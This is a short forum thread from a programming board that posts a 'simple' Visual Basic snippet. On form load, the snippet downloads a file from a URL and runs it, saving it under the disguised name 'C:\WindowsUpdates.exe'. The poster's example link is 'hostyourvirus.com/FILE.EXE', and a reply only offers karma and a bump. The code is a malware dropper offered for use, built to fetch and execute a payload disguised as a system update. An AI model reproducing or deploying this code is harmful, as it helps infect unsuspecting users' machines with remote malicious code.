Tech Lounge > Programming

Download & Execute File -VB- SIMPLE CODE

(1/1)

HeLLMoÐÐ:


Double click the form and under form1 load private sub type this:
        My.Computer.Network.DownloadFile("Url", "C:\WindowsUpdates.exe")
        Process.Start("C:\WindowsUpdates.exe")

Let me analyze a bit:
My.Computer.Network.DownloadFile("Url", "C:\WindowsUpdates.exe")
So, Url = direct link of your file (ex: hostyourvirus.com/FILE.EXE)

"C:\WindowsUpdates.exe" = the name ur file is gonna get named when it gets downloaded


Thanks for reading,

» Magic «:
I already know this but, +1 Karma, And BUMP!

Navigation

[0] Message Index

Go to full version